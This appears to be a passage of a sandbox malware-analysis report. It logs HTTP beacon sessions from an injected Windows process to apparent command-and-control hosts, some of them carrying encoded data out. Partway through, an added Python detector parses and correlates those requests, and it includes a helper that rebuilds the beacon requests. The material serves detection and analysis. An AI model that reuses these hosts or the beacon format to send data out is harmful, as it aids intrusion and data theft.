                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMThkYzBjYzgtZjg4My00OTFiLWI2OWQtNWI3MDViNDBlZTVlIiwicGFnZV90aW1lIjoxNzI1MzYwND


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      14 | 192.168.2.4 | 49755 | 199.59.243.226 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:47:16.228790045 CEST | 758 | OUT | POST /kc69/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 221
                      Host: www.asian-massage-us.xyz
                      Origin: http://www.asian-massage-us.xyz
                      Referer: http://www.asian-massage-us.xyz/kc69/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 41 6b 42 6c 30 78 4e 53 47 6b 76 6b 2f 69 52 30 6e 74 31 71 2b 4b 63 49 50 30 46 66 6f 6d 36 6d 6d 30 31 6a 73 69 71 31 44 46 72 79 46 62 4b 4b 5a 6e 74 73 63 52 31 78 74 47 64 6e 6b 6c 48 78 56 31 7a 70 48 6b 64 38 76 4d 48 54 2f 4b 36 61 62 77 57 65 54 72 7a 44 72 2f 6d 41 43 57 6a 59 35 34 77 38 58 48 31 41 62 33 49 79 77 71 6b 75 70 66 37 72 30 71 4b 2b 4f 5a 48 47 72 36 63 6d 56 37 76 66 30 52 4f 55 79 34 41 52 5a 70 4b 59 31 4a 2f 6e 55 45 35 31 78 68 42 54 53 46 52 4a 4b 66 73 55 30 4b 48 68 47 6b 75 52 2f 57 77 56 4b 6d 65 70 62 57 64 44 5a 2f 63 62 67 57 38 75 48 61 4e 57 7a 62 4f 5a 59 70 71 34 4f 6c 6f 35 52 33 58 59 36 62 67 3d
                      Data Ascii: TJY8=AkBl0xNSGkvk/iR0nt1q+KcIP0Ffom6mm01jsiq1DFryFbKKZntscR1xtGdnklHxV1zpHkd8vMHT/K6abwWeTrzDr/mACWjY54w8XH1Ab3Iywqkupf7r0qK+OZHGr6cmV7vf0ROUy4ARZpKY1J/nUE51xhBTSFRJKfsU0KHhGkuR/WwVKmepbWdDZ/cbgW8uHaNWzbOZYpq4Olo5R3XY6bg=
                      Sep 3, 2024 12:47:16.668078899 CEST | 1236 | IN | HTTP/1.1 200 OK
                      date: Tue, 03 Sep 2024 10:47:16 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1146
                      x-request-id: 1ab84bac-de39-46b5-aa34-cff70f9a11e9
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==
                      set-cookie: parking_session=1ab84bac-de39-46b5-aa34-cff70f9a11e9; expires=Tue, 03 Sep 2024 11:02:16 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6c 41 52 4a 68 71 4c 6d 6d 57 56 48 38 62 2f 47 44 49 68 77 7a 4a 7a 64 6e 34 35 6b 66 74 33 6b 36 4f 65 2f 47 75 32 2f 41 4c 62 6d 32 38 66 32 4c 59 73 72 44 4e 75 50 68 66 30 74 35 66 34 39 39 75 47 30 44 50 5a 55 4a 73 6f 43 49 79 30 4d 68 6a 5a 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 3, 2024 12:47:16.668102980 CEST | 599 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWFiODRiYWMtZGUzOS00NmI1LWFhMzQtY2ZmNzBmOWExMWU5IiwicGFnZV90aW1lIjoxNzI1MzYwND


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      15 | 192.168.2.4 | 49756 | 199.59.243.226 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:47:18.779081106 CEST | 10840 | OUT | POST /kc69/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 10301
                      Host: www.asian-massage-us.xyz
                      Origin: http://www.asian-massage-us.xyz
                      Referer: http://www.asian-massage-us.xyz/kc69/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 41 6b 42 6c 30 78 4e 53 47 6b 76 6b 2f 69 52 30 6e 74 31 71 2b 4b 63 49 50 30 46 66 6f 6d 36 6d 6d 30 31 6a 73 69 71 31 44 46 6a 79 45 74 47 4b 59 45 31 73 66 52 31 78 75 47 64 36 6b 6c 48 4a 56 30 62 74 48 6b 52 47 76 4b 44 54 2f 70 69 61 4b 52 57 65 49 62 7a 44 6e 66 6d 37 4d 32 69 41 35 34 67 67 58 48 46 41 62 33 49 79 77 76 67 75 75 4f 37 72 32 71 4b 39 65 35 48 53 68 61 64 6f 56 37 32 6e 30 52 62 6a 7a 4c 49 52 59 4a 36 59 34 66 72 6e 5a 45 34 54 69 52 41 4f 53 46 63 54 4b 5a 49 32 30 4b 44 62 47 6d 79 52 39 79 5a 33 51 30 4b 2b 66 56 74 39 48 63 77 6a 6f 32 77 33 43 39 4e 31 7a 36 61 2f 4a 61 43 70 49 45 4a 31 42 6c 4c 4e 6c 2b 65 44 51 4a 48 38 6c 63 63 61 42 75 79 50 35 54 4e 47 78 50 47 42 42 6e 42 41 44 55 55 55 37 73 37 61 59 2b 31 38 4e 72 33 7a 66 50 49 4c 59 41 76 77 38 63 58 43 58 37 61 4c 76 4f 4d 6f 4a 55 44 64 4c 56 37 6b 4f 77 5a 67 6d 4a 43 4d 30 6e 6e 6f 33 78 4c 70 66 70 6e 66 7a 57 63 33 57 2b 34 43 5a 66 2b 32 59 54 52 67 75 63 58 6a 70 39 57 4c 75 4b 78 4a 6d [TRUNCATED]
                      Data Ascii: TJY8= [TRUNCATED]
                      Sep 3, 2024 12:47:19.220160961 CEST | 1236 | IN | HTTP/1.1 200 OK
                      date: Tue, 03 Sep 2024 10:47:19 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1146
                      x-request-id: c394b047-f836-4735-9af8-ce8399badc3f
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==
                      set-cookie: parking_session=c394b047-f836-4735-9af8-ce8399badc3f; expires=Tue, 03 Sep 2024 11:02:19 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6c 41 52 4a 68 71 4c 6d 6d 57 56 48 38 62 2f 47 44 49 68 77 7a 4a 7a 64 6e 34 35 6b 66 74 33 6b 36 4f 65 2f 47 75 32 2f 41 4c 62 6d 32 38 66 32 4c 59 73 72 44 4e 75 50 68 66 30 74 35 66 34 39 39 75 47 30 44 50 5a 55 4a 73 6f 43 49 79 30 4d 68 6a 5a 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 3, 2024 12:47:19.220181942 CEST | 599 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzM5NGIwNDctZjgzNi00NzM1LTlhZjgtY2U4Mzk5YmFkYzNmIiwicGFnZV90aW1lIjoxNzI1MzYwND


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      16 | 192.168.2.4 | 49757 | 199.59.243.226 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:47:21.326735973 CEST | 460 | OUT | GET /kc69/?TJY8=NmpF3EhDDWuD2jtxofhf+uMKfjRAnSqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGPfCZkMeDDDW6mIEhSXgEQREY6q1xuM7O6IY=&3L7=cfJLLBshpRPDzp HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Language: en-us
                      Connection: close
                      Host: www.asian-massage-us.xyz
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Sep 3, 2024 12:47:21.773591995 CEST | 1236 | IN | HTTP/1.1 200 OK
                      date: Tue, 03 Sep 2024 10:47:21 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1482
                      x-request-id: 9936824a-4311-41ca-b5a7-2eda1617f8a0
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IuHzO4p84Ftc510bj39wW/bOL9zCkCimy9EWNedPf31lo0YBtO16S25MDQptOSunFX5lxeSgyXLGQ6pQxo1egg==
                      set-cookie: parking_session=9936824a-4311-41ca-b5a7-2eda1617f8a0; expires=Tue, 03 Sep 2024 11:02:21 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 75 48 7a 4f 34 70 38 34 46 74 63 35 31 30 62 6a 33 39 77 57 2f 62 4f 4c 39 7a 43 6b 43 69 6d 79 39 45 57 4e 65 64 50 66 33 31 6c 6f 30 59 42 74 4f 31 36 53 32 35 4d 44 51 70 74 4f 53 75 6e 46 58 35 6c 78 65 53 67 79 58 4c 47 51 36 70 51 78 6f 31 65 67 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IuHzO4p84Ftc510bj39wW/bOL9zCkCimy9EWNedPf31lo0YBtO16S25MDQptOSunFX5lxeSgyXLGQ6pQxo1egg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 3, 2024 12:47:21.773606062 CEST | 935 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTkzNjgyNGEtNDMxMS00MWNhLWI1YTctMmVkYTE2MTdmOGEwIiwicGFnZV90aW1lIjoxNzI1MzYwND
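
Sessions 13 to 16 above record one complete beacon cycle from the injected process to www.asian-massage-us.xyz: two short POSTs of 201 and 221 bytes, one 10301-byte POST, then a GET that reuses the TJY8 parameter and adds a second one, all with Connection: close, Origin and Referer pointing back at the contacted host and a fixed Chrome/47.0.2504.0 User-Agent. The 200 OK replies are a domain-parking page (x-adblock-key header, parking_session cookie, window.park script), so the server side of this capture is not a live controller and says nothing about the protocol; the request shape is what is worth matching. The Python below is an added example written for this report, not Joe Sandbox tooling and not code from the sample, that parses raw requests of that shape and correlates them per host and key. The key name TJY8, the second parameter 3L7 and the path /kc69/ are specific to this sample, so the detector treats them as variables; that generalisation, the 2 to 8 character bounds and the 1024-byte check-in versus exfiltration threshold are assumptions, not facts from the report. The sample requests are constructed from the headers, bodies and query visible above; the truncated 10301-byte body of session 15 is replaced by a same-length placeholder.

```python
"""Beacon-shape detector for the traffic in sessions 13-16 above (added example)."""
import base64
import re
from urllib.parse import urlsplit

BEACON_UA = "Chrome/47.0.2504.0"                 # build string present in every request above
SHORT_DIR = re.compile(r"^/[A-Za-z0-9]{2,8}/$")  # /kc69/ and /ifo8/; the 2-8 bound is an assumption
KV_B64 = r"([A-Za-z0-9]{2,8})=([A-Za-z0-9+/]+={0,2})"  # one key with a raw, unencoded base64 value
FORM_BODY = re.compile(rf"^{KV_B64}$")
GET_QUERY = re.compile(rf"^{KV_B64}&([A-Za-z0-9]{{2,8}})=([A-Za-z0-9]+)$")
EXFIL_MIN = 1024  # assumption: 201/221-byte bodies are check-ins, the 10301-byte body carries stolen data


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def _same_host(headers: dict, field: str) -> bool:
    """True when the URL in `field` (Origin or Referer) names the same host as the Host header."""
    value = headers.get(field)
    return value is not None and urlsplit(value).hostname == headers.get("host", "").split(":")[0]


def classify_request(raw: str):
    """Return (host, key, kind) when a request has the beacon shape, otherwise None."""
    req = parse_http_request(raw)
    h = req["headers"]
    if BEACON_UA not in h.get("user-agent", "") or h.get("connection", "").lower() != "close":
        return None
    url = urlsplit(req["target"])
    if not SHORT_DIR.match(url.path):
        return None
    if req["method"] == "POST":
        m = FORM_BODY.match(req["body"])
        if not m or h.get("content-type") != "application/x-www-form-urlencoded":
            return None
        if not (_same_host(h, "origin") and _same_host(h, "referer")):
            return None
        kind = "exfil" if len(req["body"]) >= EXFIL_MIN else "checkin"
        return (h["host"], m.group(1), kind)
    if req["method"] == "GET":
        m = GET_QUERY.match(url.query)
        return (h["host"], m.group(1), "poll") if m else None
    return None


def correlate(raw_requests) -> dict:
    """Group hits by (host, key); report keys that a POST and a later GET both carry."""
    seen = {}
    for raw in raw_requests:
        hit = classify_request(raw)
        if hit:
            host, key, kind = hit
            seen.setdefault((host, key), []).append(kind)
    return {k: kinds for k, kinds in seen.items() if "poll" in kinds and len(kinds) > 1}


def _request(method: str, path: str, host: str, body=None, ua: str = BEACON_UA) -> str:
    """Constructed sample request using the header set seen in the sessions above."""
    lines = [f"{method} {path} HTTP/1.1",
             "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
             "Accept-Language: en-us", "Connection: close", f"Host: {host}",
             f"User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) {ua} Safari/537.36"]
    if body is not None:
        lines += ["Content-Type: application/x-www-form-urlencoded", f"Content-Length: {len(body)}",
                  f"Origin: http://{host}", f"Referer: http://{host}{path}"]
    return "\r\n".join(lines) + "\r\n\r\n" + (body or "")


C2 = "www.asian-massage-us.xyz"
# Bodies of sessions 13 and 14 and the query of session 16 are copied from the transcript above;
# the 10301-byte body of session 15 is truncated on the page, so a same-length placeholder stands in.
SAMPLE_REQUESTS = [
    _request("POST", "/kc69/", C2, "TJY8=AkBl0xNSGkvk+Ch0mOdqp6cHTkFfzW6im0xjsgGlD2PyF+uKYmtsZR1x/md+qFHmV1/hHmZ8vMTT/LKabj+dQbzBjfm4M2jY54w8XHR6b3wywa0uo+7o8KK9e5HGhac9V7vh0QDJy+ERZs2Y1cTkfE4f8BAdCkwZHaZb5bv4Pk3x+QhPbX/+JW5wE4VvtVBncQ=="),
    _request("POST", "/kc69/", C2, "TJY8=AkBl0xNSGkvk/iR0nt1q+KcIP0Ffom6mm01jsiq1DFryFbKKZntscR1xtGdnklHxV1zpHkd8vMHT/K6abwWeTrzDr/mACWjY54w8XH1Ab3Iywqkupf7r0qK+OZHGr6cmV7vf0ROUy4ARZpKY1J/nUE51xhBTSFRJKfsU0KHhGkuR/WwVKmepbWdDZ/cbgW8uHaNWzbOZYpq4Olo5R3XY6bg="),
    _request("POST", "/kc69/", C2, "TJY8=" + base64.b64encode(b"\x00" * 7722).decode()),
    _request("GET", "/kc69/?TJY8=NmpF3EhDDWuD2jtxofhf+uMKfjRAnSqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGPfCZkMeDDDW6mIEhSXgEQREY6q1xuM7O6IY=&3L7=cfJLLBshpRPDzp", C2),
]
# Constructed ordinary login POST: same content type, but a multi-field body and a current browser UA.
BENIGN_LOGIN = _request("POST", "/login/", "intranet.example", "user=alice&pass=hunter2", ua="Chrome/128.0.0.0")

if __name__ == "__main__":
    for (host, key), kinds in correlate(SAMPLE_REQUESTS).items():
        print(f"beacon chain to {host} with key {key}: {' -> '.join(kinds)}")
    print("benign login classified as:", classify_request(BENIGN_LOGIN))
```

Run it directly to print the correlated chain for the constructed sessions; in a pipeline, feed it reassembled client requests (not the responses, which here are only parking pages) from an HTTP transaction log or a pcap. Because the key name and host are sample-specific, alert on the chain, several single-key POSTs followed by a GET reusing that key against the same host, rather than on any one request; the fixed Chrome 47 build string alone would also match stale automation and is only used here as a first filter.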


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      17 | 192.168.2.4 | 49758 | 5.144.130.52 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:47:34.948638916 CEST | 720 | OUT | POST /ifo8/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.aflaksokna.com
                      Origin: http://www.aflaksokna.com
                      Referer: http://www.aflaksokna.com/ifo8/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 37 57 67 70 66 49 44 34 6f 46 59 35 44 74 68 68 78 39 59 6e 76 50 43 53 54 59 6b 6f 44 31 35 7a 45 57 6d 43 79 65 63 50 57 51 74 65 48 63 65 46 7a 74 30 51 64 71 45 73 49 48 74 62 57 38 72 64 70 76 35 4c 67 30 41 47 63 63 38 71 47 47 4d 75 52 68 77 39 69 65 79 4e 53 30 66 47 2f 57 57 4a 55 33 54 47 38 4c 58 53 76 4c 74 50 58 49 39 59 68 44 42 48 7a 69 64 44 36 4f 49 65 45 37 4a 41 48 36 4a 32 4d 54 41 58 75 39 46 61 46 4a 78 36 55 33 52 56 38 70 45 70 35 69 31 66 4b 70 63 2f 51 67 77 37 77 58 41 2f 7a 41 30 70 70 30 57 59 2b 71 42 72 6c 36 45 36 74 65 36 7a 75 46 74 51 5a 77 3d 3d
                      Data Ascii: TJY8=7WgpfID4oFY5Dthhx9YnvPCSTYkoD15zEWmCyecPWQteHceFzt0QdqEsIHtbW8rdpv5Lg0AGcc8qGGMuRhw9ieyNS0fG/WWJU3TG8LXSvLtPXI9YhDBHzidD6OIeE7JAH6J2MTAXu9FaFJx6U3RV8pEp5i1fKpc/Qgw7wXA/zA0pp0WY+qBrl6E6te6zuFtQZw==


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      18 | 192.168.2.4 | 49759 | 5.144.130.52 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:47:37.507653952 CEST | 740 | OUT | POST /ifo8/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 221
                      Host: www.aflaksokna.com
                      Origin: http://www.aflaksokna.com
                      Referer: http://www.aflaksokna.com/ifo8/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 37 57 67 70 66 49 44 34 6f 46 59 35 44 4d 52 68 33 65 41 6e 6e 50 43 54 50 6f 6b 6f 4e 56 35 6f 45 57 71 43 79 63 78 43 56 6c 39 65 48 35 61 46 79 73 30 51 65 71 45 73 44 6e 74 65 5a 63 72 73 70 76 38 6f 67 78 34 47 63 63 34 71 47 44 6f 75 52 53 49 79 6a 4f 79 50 61 55 66 49 37 57 57 4a 55 33 54 47 38 4c 54 6f 76 4c 31 50 57 34 4e 59 75 47 74 41 36 43 64 41 7a 75 49 65 54 72 4a 45 48 36 4a 49 4d 53 73 78 75 37 5a 61 46 49 42 36 55 6b 4a 57 7a 70 45 6e 39 69 30 51 47 59 31 4b 5a 78 31 48 76 30 6f 6e 30 7a 34 31 6f 79 48 43 76 62 67 38 33 36 67 4a 77 5a 7a 48 6a 47 51 5a 43 35 78 30 65 56 56 31 57 73 50 4a 6a 58 64 75 30 38 50 50 75 59 6b 3d
                      Data Ascii: TJY8=7WgpfID4oFY5DMRh3eAnnPCTPokoNV5oEWqCycxCVl9eH5aFys0QeqEsDnteZcrspv8ogx4Gcc4qGDouRSIyjOyPaUfI7WWJU3TG8LTovL1PW4NYuGtA6CdAzuIeTrJEH6JIMSsxu7ZaFIB6UkJWzpEn9i0QGY1KZx1Hv0on0z41oyHCvbg836gJwZzHjGQZC5x0eVV1WsPJjXdu08PPuYk=


